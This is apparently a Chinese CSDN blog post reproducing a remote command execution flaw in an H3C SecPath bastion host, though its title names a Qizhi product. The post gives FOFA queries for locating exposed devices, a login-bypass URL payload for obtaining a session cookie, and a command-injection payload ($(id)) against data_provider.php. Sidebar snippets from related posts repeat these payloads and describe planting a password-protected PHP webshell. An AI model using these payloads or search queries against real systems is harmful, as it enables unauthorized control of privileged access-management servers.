齐治运维堡垒机后台命令执行漏洞

最新推荐文章于 2024-06-04 14:44:10 发布
最新推荐文章于 2024-06-04 14:44:10 发布
阅读量1.9k 收藏
点赞数
分类专栏: # 漏洞复现
https://blog.csdn.net/qq_44657899
本文链接:https://blog.csdn.net/qq_44657899/article/details/118254544
版权

文章目录

漏洞描述

H3C SecParh堡垒机 data_provider.php 存在远程命令执行漏洞

漏洞影响

H3C SecParh堡垒机

漏洞复现

fofa语法:

app="H3C-SecPath-运维审计系统"
icon_hash="-1657751447"

在这里插入图片描述

先通过任意用户登录获取Cookie,/audit/gui_detail_view.php?token=1&id=%5C&uid=%2Cchr(97))%20or%201:%20print%20chr(121)%2bchr(101)%2bchr(115)%0d%0a%23&login=admin
在这里插入图片描述

命令执行payload,/audit/data_provider.php?ds_y=2019&ds_m=04&ds_d=02&ds_hour=09&ds_min40&server_cond=&service=$(id)&identity_cond=&query_type=all&format=json&browse=true

在这里插入图片描述

在这里插入图片描述

天问_Herbert555
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
齐治堡垒机后台存在命令执行漏洞(CNVD-2019-17294)分析
aijin3040的博客
07-16 1254
基本信息 引用:https://www.cnvd.org.cn/flaw/show/CNVD-2019-17294 补丁信息:该漏洞的修复补丁已于2019年6月25日发布。如果客户尚未修复该补丁,可联系齐治科技的技术支持人员获得具体帮助。 漏洞复现 如下图,通过在传递参数”service=`id`”,成功执行命令,并回显命令执行结果。 ...
齐治堡垒机前台远程命令执行漏洞(CNVD-2019-20835)分析
aijin3040的博客
07-27 3605
一、基本信息   漏洞公告:https://www.cnvd.org.cn/flaw/show/1632201   补丁信息:该漏洞的修复补丁已发布,如果客户尚未修复该补丁,可联系齐治科技的技术支持人员获得具体帮助。 二、源代码分析   问题出现在ha_request.php文件,第37行的exec函数,$url为用户可控的变量,可见第33和34行。目光来到第23和24行,只要n...
齐治堡垒机任意用户登录漏洞
maverickpig的博客
01-23 4001
2021年进入网络安全行业,作为网络安全的小白,分享一些自学基础教程给大家。希望在自己能体系化的总结自己已有的知识的同时,能对各位博友有所帮助。文章内容比较基础,都是参考了很多大神的文章,各位不喜勿喷,谢谢!如果文章对您有帮助,将是我创作的最大动力! 由于传播和使用本文所提供的任何直接或间接的后果和损失,均由用户承担,作者对此不承担任何责任。如果文章出现敏感内容产生不良影响,请联系作者删除。 工作中遇到的漏洞,记录一下,本文仅作学习之用,请勿进行网络犯罪,遵守《网络安全法》等相关法律法规。 漏洞说明 浙江齐
【nday】HVV2023 安恒明御堡垒机存在接口未授权
最新发布
伏一
06-04 522
"明御运维审计与风险控制系统"
齐治堡垒机ShtermClient-2.1.1命令执行漏洞(CNVD-2019-09593)分析
aijin3040的博客
07-17 3829
一、基本信息 参考:https://www.cnvd.org.cn/flaw/show/1559039 补丁信息:该漏洞的修复补丁已于2019年4月1日发布。如果客户尚未修复该补丁,可联系齐治科技的技术支持人员获得具体帮助。 二、漏洞挖掘过程 这是我第一次接触运维堡垒机,通过堡垒机登录目标服务器/应用,就像在本地直接打开一样,觉得很神奇。 1、挖掘过程 首先,在安装齐治运维堡...
H3C SecParh堡垒机 data_provider.php 远程命令执行漏洞
Adminxe的博客
07-02 862
0x00 前言 H3C SecParh堡垒机 data_provider.php 存在远程命令执行漏洞,攻击者通过任意用户登录或者账号密码进入后台就可以构造特殊的请求执行命令漏洞类似于齐治堡垒机 0x01 影响范围 H3C SecParh堡垒机 0x02 漏洞复现 先通过任意用户登录获取Cookie /audit/gui_detail_view.php?token=1&id=%5C&uid=%2Cchr(97))%20or%201:%20print%20chr(1..
HW第二天:0day快递盒在线送day
weixin_41489908的博客
09-12 327
截止到2020年9月12日:0day清单 转自F11Team 齐治堡垒机前台远程命令执行漏洞 漏洞利用: 利用条件:无需登录: 第一 http://10.20.10.11/listener/cluster_manage.php 返回“OK”。 第二,执行以下链接即可 getshell,执行成功后,生成 PHP 一句话马 /var/www/shterm/resources/qrcode/lbj77.php 密码 10086,使用 BASE64 进行编码。这里假设 10.20.10.10 为
学习笔记-常见安全设备渗透方法
人饭子的博客
10-30 1356
SecDevice - Exploits 免责声明 本文档仅供学习和研究使用,请勿使用文中的技术源码用于非法用途,任何人造成的任何负面影响,与本人无关. 大纲 身份与访问控制 堡垒机 IMC 网络检测与响应 蜜罐 IDS 防火墙 WAF 网关 负载均衡 VPN 终端响应与检测 杀软 EDR 数据防泄漏系统 身份与访问控制 堡垒机 齐治堡垒机 Fofa: app...
Python实现堡垒机模式下远程命令执行操作示例
12-31
本文实例讲述了Python实现堡垒机模式下远程命令执行操作。分享给大家供大家参考,具体如下: 一 点睛 堡垒机环境在一定程度上提升了运营安全级别,但同时也提高了日常运营成本,作为管理的中转设备,任何针对业务...
企业运维管理-开源堡垒机
03-06
企业运维管理中的堡垒机是一种关键的安全工具,它主要用于管理和审计对服务器的远程访问。开源堡垒机,例如JumpServer,提供了一种经济高效的方式来确保企业网络安全,同时满足了法规遵从性和内部安全策略的要求。 ...
运维堡垒机产品白皮书.docx
10-23
### 运维堡垒机产品知识点解析 #### 一、运维堡垒机概述 **运维堡垒机**,也称为**运维安全网关**,是一种专门用于管理、监控和审计IT运维人员操作的安全设备。它通过对运维过程的全面跟踪、控制、记录和回放,...
qizhi_ssh:绕过齐治堡垒机1000台机器限制
05-11
系统介绍 适用于使用了 "齐治科技堡垒主机" 的企业 主要功能是利用中转手段,绕过商用1000台服务的限制 使得齐治支持10万台服务器登录 为啥做这个系统 公司里一开始引进了齐治堡垒机, 但是原生的系统有几个问题 a) 界面难看死了 b) 没办法关联项目 c) 最重要的是它只支持1000台记录的录入, 多了就无法通过堡垒机登录审计了 d) 录入机器贼麻烦 于是我就有了一个想法 可否封装一个web页面, 利用cookie模拟登陆的手法, 去调用齐治的接口, 获得它的session_id; 再利用session_id 去请求它的服务接口, 获得加密串 最后再拦截登录过程 在调用齐治前, 注入用户的账号密码到xshell软件的配置 然后再利用加密串调用齐治本身 最重要的是要绕过他1000台服务器的限制 !! 为公司节约成本 功能截图 开源版本功能阉割了,只有ip列表+登录按钮 机器列表 点击"登
知道创宇运维审计堡垒机系统客户端
11-08
知道创宇运维审计堡垒机系统客户端
齐治堡垒机学习资料.zip
05-29
齐治堡垒机学习资料是一个关于网络安全管理工具的资源包,主要涵盖了齐治科技的堡垒机的相关知识。堡垒机,也称为运维审计系统,是企业网络安全架构中的重要组成部分,主要用于管理和控制对网络设备、服务器等关键...
齐治堡垒机某版本任意用户登录漏洞复现
ranuy阮的博客
05-20 3237
漏洞点 /audit/gui_detail_view.php poc /audit/gui_detail_view.php?token=1&id=%5C&uid=%2Cchr(97))%20or%201:%20print%20chr(121)%2bchr(101)%2bchr(115)%0d%0a%23&login=shterm fofa app="齐治科技-堡垒机" 验证 URL https://xx.xx.xx.xx/audit/gui_detail_view.php?to
mysql堡垒机漏洞_关于近期网传齐治堡垒机漏洞的声明
weixin_39759589的博客
02-02 641
尊敬的用户:齐治科技(下述简称“齐治”)注意到近期有消息称“齐治堡垒机存在未修复的前台远程代码执行漏洞”。经过确认,消息提及的漏洞齐治已停售产品Shterm的已修复漏洞,请仍在使用Shterm堡垒机的用户及时升级至最新版本。详细情况如下。//消息来源一网上流传一张涉及齐治堡垒机的图片(其他厂家信息已做模糊处理)。可以看到该信息非常简单,所述漏洞缺少细节,并且把“齐治”写成“奇治”,可采信度很低...
红队中的一些重点系统漏洞整理(通用的一些漏洞
qq_50854662的博客
02-20 795
红队中的一些重点系统漏洞整理(通用的一些漏洞
齐治堡垒机_任意用户登录漏洞
MD@@nr丫卡uer
04-12 1889
fofa查询语法 app=“齐治科技-堡垒机漏洞复现 漏洞POC为 http://xxx.xxx.xxx.xxx/audit/gui_detail_view.php?token=1&id=%5C&uid=%2Cchr(97))%20or%201:%20print%20chr(121)%2bchr(101)%2bchr(115)%0d%0a%23&login=shterm
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值